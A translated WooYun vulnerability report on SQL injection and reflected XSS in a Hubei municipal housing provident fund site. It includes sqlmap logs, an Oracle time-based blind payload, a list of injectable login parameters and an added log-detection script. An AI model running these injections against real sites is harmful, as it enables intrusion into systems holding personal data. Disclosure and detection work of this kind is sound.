
Vulnerability summary

Defect ID: wooyun-2015-0131145

Title: Multiple serious vulnerabilities in a municipal housing provident fund site in Hubei (bundled submission)

Affected vendor: CNCERT (National Internet Emergency Center)

Author: 撸至深

Submitted: 2015-08-04 21:41

Fixed: 2015-09-21 09:54

Published: 2015-09-21 09:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-04: Details sent to the vendor; awaiting vendor handling
2015-08-07: Vendor has confirmed; details disclosed to the vendor only
2015-08-17: Details disclosed to core white hats and relevant domain experts
2015-08-27: Details disclosed to regular white hats
2015-09-06: Details disclosed to intern white hats
2015-09-21: Details disclosed to the public

Brief description:

Serving it up.....

Detailed description:

See proof of vulnerability

Proof of vulnerability:

First, here is the sqlmap output:
[18:53:46] [INFO] using 'D:\Python27\sqlmap\output\www.xggjj.com\session' as ses
sion file
[18:53:46] [INFO] resuming injection data from session file
[18:53:46] [INFO] resuming back-end DBMS 'oracle' from session file
[18:53:46] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: cardno
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cardno=420921198709233456') AND 5514=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
65)||CHR(106)||CHR(103)||CHR(86),5) AND ('XoMu'='XoMu&WZMM=123456&code=32157&but
ton=锟结交
---
[18:53:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Oracle
[18:53:46] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[18:53:46] [INFO] fetching database (schema) names
[18:53:46] [INFO] fetching number of databases
[18:53:46] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': 1
[18:53:46] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': CTXSYS
available databases [1]:
[*] CTXSYS
[18:53:46] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.xggjj.com'
[*] shutting down at: 18:53:46
D:\Python27\sqlmap>sqlmap.py -u "http://www.xggjj.com/cx/login.asp" --data="card
no=7043987&code=2814355&button=提交&WZMM=9173184" -D CTXSYS --tables
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 18:57:02
[18:57:02] [INFO] using 'D:\Python27\sqlmap\output\www.xggjj.com\session' as ses
sion file
[18:57:02] [INFO] resuming injection data from session file
[18:57:02] [INFO] resuming back-end DBMS 'oracle' from session file
[18:57:02] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: cardno
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cardno=420921198709233456') AND 5514=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
65)||CHR(106)||CHR(103)||CHR(86),5) AND ('XoMu'='XoMu&WZMM=123456&code=32157&but
ton=锟结交
---
[18:57:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Oracle
[18:57:02] [INFO] fetching tables for database 'CTXSYS'
[18:57:02] [INFO] fetching number of tables for database 'CTXSYS'
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': 43
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$CLASS
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$CLASCa
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$OBJECT_ATTRIBUTE
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$OBJECT_ATTRIBUTE_LOV
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$PREFERENCE
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$PREFERENCE_VALUE
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$INDEX
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:02] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] retrieved:
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] retrieved:
[18:57:06] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:06] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:06] [INFO] retrieved:
[18:57:07] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:07] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:07] [INFO] retrieved:
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': !
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:08] [INFO] retrieved:
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] retrieved:
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] retrieved:
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': A
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:10] [INFO] retrieved:
[18:57:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:11] [INFO] retrieved:
[18:57:12] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:12] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:12] [INFO] retrieved:
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': A
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] retrieved:
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] retrieved:
[18:57:14] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:14] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:14] [INFO] retrieved:
[18:57:15] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:15] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:15] [INFO] retrieved:
[18:57:16] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:16] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:16] [INFO] retrieved:
[18:57:17] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:17] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:17] [INFO] retrieved:
[18:57:17] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] retrieved:
[18:57:18] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] retrieved:
[18:57:19] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:19] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:19] [INFO] retrieved:
[18:57:20] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:20] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:20] [INFO] retrieved:
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': !
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] retrieved:
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] retrieved:
[18:57:22] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:22] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:22] [INFO] retrieved:
[18:57:23] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:23] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:23] [INFO] retrieved:
[18:57:24] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:24] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:24] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:24] [INFO] retrieved:
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] retrieved:
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] retrieved:
Database: CTXSYS
[43 tables]
+---------------------------+
| "!" |
| "!" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "DR$CLASCa" |
| "DR$CLASS" |
| "DR$INDEX" |
| "DR$OBJECT_ATTRIBUTE" |
| "DR$OBJECT_ATTRIBUTE_LOV" |
| "DR$PREFERENCE" |
| "DR$PREFERENCE_VALUE" |
| "\02" |
| "\03" |
| "\11\05" |
| A |
| A |
+---------------------------+
What do those "" entries at the end mean?
Never mind; it is enough to prove that the vulnerability really exists.
The other holes are listed below; I won't run each of them individually.
No. 1
ReferURL http://www.xggjj.com/
ActionURL http://www.xggjj.com/search.asp?KeyWord=99999999
Parameter KeyWord
Vulnerability GET SQL INJECTION BooleanBased Integer
No. 2
ReferURL http://www.xggjj.com/
ActionURL http://www.xggjj.com/search.asp?KeyWord=7030914<img src=0 onerror="alert(4593423)">
Parameter KeyWord
Vulnerability GET XSS Reflected
No. 3
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^WZMM=9173184&code=2814355&button=提交&cardno=99999999
Parameter cardno
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 4
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^WZMM=9173184&code=2814355&button=提交&cardno=7043987
Parameter cardno
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 5
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&code=2814355&button=提交&WZMM=99999999
Parameter WZMM
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 6
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&code=2814355&button=提交&WZMM=9173184
Parameter WZMM
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 7
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&button=提交&code=99999999
Parameter code
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 8
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&button=提交&code=2814355
Parameter code
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 9
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&code=2814355&button=99999999
Parameter button
Vulnerability POST SQL INJECTION BooleanBased String
No. 10
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&code=2814355&button=提交
Parameter button
Vulnerability POST SQL INJECTION BooleanBased Integer
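The sqlmap session above confirmed an Oracle time-based blind injection (the DBMS_PIPE.RECEIVE_MESSAGE payload sleeps 5 seconds) on the login form, and the scanner listing adds boolean-based injections and a reflected XSS on search.asp. The following is an added example, not code from the report or from the affected site, showing how a defender could flag these request patterns from the page in an access log. The log format (client, method, path, response time in ms, URL-encoded parameters), the sample lines, the client addresses (documentation ranges), the card number and the 5-second threshold are all constructed for the example; the signature regexes are derived from the payload shapes quoted in the report.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes quoted in this report.
SIGNATURES = {
    # Oracle time-based blind: DBMS_PIPE.RECEIVE_MESSAGE(<msg>, <seconds>)
    "oracle_time_blind": re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I),
    # Quote/paren break-out followed by a boolean tail, e.g. ') AND 5514=...
    "quote_breakout": re.compile(r"['\"]\s*\)*\s*(AND|OR)\s+\S+\s*=", re.I),
    # Numeric tautology typical of boolean-based integer injection, e.g. AND 1=1
    "boolean_tautology": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    # Reflected XSS via an <img> tag carrying an onerror handler
    "img_onerror": re.compile(r"<\s*img[^>]*\bonerror\s*=", re.I),
}

# Constructed threshold: the report's payload asks the DBMS to wait 5 seconds,
# so a matching request that also took >= 5 s is treated as a confirmed delay.
SLOW_MS = 5000

# Constructed sample log. Format (assumed, not IIS's own):
#   <client> <method> <path> <time_taken_ms> <url-encoded params>
SAMPLE_LOG = """\
203.0.113.10 GET /search.asp 120 KeyWord=99999999
203.0.113.10 GET /search.asp 131 KeyWord=7030914%3Cimg+src%3D0+onerror%3D%22alert%281%29%22%3E
203.0.113.10 POST /cx/login.asp 5230 cardno=1234567890%27%29+AND+5514%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2865%29%2C5%29+AND+%28%27XoMu%27%3D%27XoMu&WZMM=123456&code=32157
203.0.113.10 GET /search.asp 118 KeyWord=99999999+AND+1%3D1
198.51.100.7 POST /cx/login.asp 140 cardno=7043987&WZMM=9173184&code=2814355&button=submit
"""


def decode_params(blob: str) -> str:
    """URL-decode a query string or form body twice so double encoding
    (%2527 for a quote, for instance) does not hide the payload."""
    return unquote_plus(unquote_plus(blob))


def classify(blob: str) -> list:
    """Return the names of all signatures matched by one parameter blob,
    in the order they are declared in SIGNATURES."""
    text = decode_params(blob)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def parse_line(line: str) -> dict:
    """Split one constructed log line into its five fields."""
    client, method, path, ms, params = line.split(" ", 4)
    return {"client": client, "method": method, "path": path,
            "ms": int(ms), "params": params}


def scan_log(text: str) -> list:
    """Scan a whole log and return (client, method, path, hits) for every
    request that matched at least one signature."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        hits = classify(rec["params"])
        # A time-based payload that really stalled the server is stronger
        # evidence than the string match alone.
        if "oracle_time_blind" in hits and rec["ms"] >= SLOW_MS:
            hits.append("confirmed_delay")
        if hits:
            findings.append((rec["client"], rec["method"], rec["path"], hits))
    return findings


if __name__ == "__main__":
    for client, method, path, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {method} {path}: {', '.join(hits)}")
```

Note the limitation the scanner listing itself illustrates: the boolean-based integer probes (cardno=99999999 and similar) carry no quote or keyword, so a signature filter cannot distinguish them from ordinary traffic. The durable fix is in the application: bind cardno, WZMM, code and button as parameters instead of concatenating them into the SQL statement, and encode KeyWord before reflecting it into the page.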

Fix recommendation:

For the fix, please consult the WooYun gurus @路人甲

Copyright notice: when reposting, please credit the source 撸至深@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-07 09:53

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Hubei branch center, which will coordinate follow-up handling with the site's administering organization.

Latest status:

None yet